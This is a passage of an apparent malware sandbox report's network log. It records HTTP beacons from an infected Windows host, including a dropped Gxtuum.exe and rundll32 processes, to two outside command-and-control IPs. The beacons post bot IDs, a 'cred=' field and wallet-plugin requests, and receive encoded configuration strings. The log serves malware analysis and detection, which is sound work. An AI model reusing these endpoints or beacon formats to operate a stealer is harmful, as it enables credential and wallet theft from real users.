                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556938887 CET155OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893367052 CET205INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                52192.168.2.1149961185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:12.694921970 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:12.815011978 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:14.136831045 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:13 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                53192.168.2.1149964185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:14.367285967 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:14.487015009 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:15.986763954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:15 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                54192.168.2.1149968185.81.68.147806040C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:15.128679991 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                                                Dec 13, 2024 08:20:16.425815105 CET711INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:15 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 512
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                55192.168.2.1149969185.81.68.147805544C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:15.364738941 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                                                Dec 13, 2024 08:20:16.736834049 CET711INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:15 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 512
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                56192.168.2.1149970185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:15.628570080 CET310OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:16.971241951 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                57192.168.2.1149971185.81.68.147803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:15.628715992 CET307OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 36 39 44 41 32 34 45 30 44 43 36 46 33 38 45 46 46 38 38 42 42 45 35 39 39 35 45 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38
                                                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A93269DA24E0DC6F38EFF88BBE5995E28B54F799507EA0FE95E0072B5E061C8
                                                                                                                                                                                                Dec 13, 2024 08:20:16.972544909 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                58192.168.2.1149972185.81.68.147805696C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:15.805485010 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 21
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                Dec 13, 2024 08:20:17.125830889 CET198INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20
                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                59192.168.2.1149973185.81.68.147802872C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:16.063693047 CET173OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Content-Length: 21
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                Dec 13, 2024 08:20:17.363583088 CET198INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20
                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                60192.168.2.1149975185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:16.226548910 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:16.346513987 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:17.915395021 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                61192.168.2.1149977185.81.68.148806040C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:17.091058016 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                                                Dec 13, 2024 08:20:18.502948046 CET711INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:17 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 512
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                62192.168.2.1149978185.81.68.148805544C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:17.091485023 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 5
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                                                Dec 13, 2024 08:20:18.471235991 CET711INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:17 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 512
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                63192.168.2.1149982185.81.68.148805696C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:17.293344975 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 21
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                Dec 13, 2024 08:20:18.626048088 CET198INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:17 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20
                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                64192.168.2.1149983185.81.68.148802872C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:17.545290947 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 21
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                Dec 13, 2024 08:20:18.870853901 CET198INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:18 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 20
                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                65192.168.2.1149984185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:18.148117065 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:20:18.268423080 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:20:19.751533031 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:20:18 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                66192.168.2.1149987185.81.68.148803076C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:20:18.747425079 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Cache-Control: no-cache
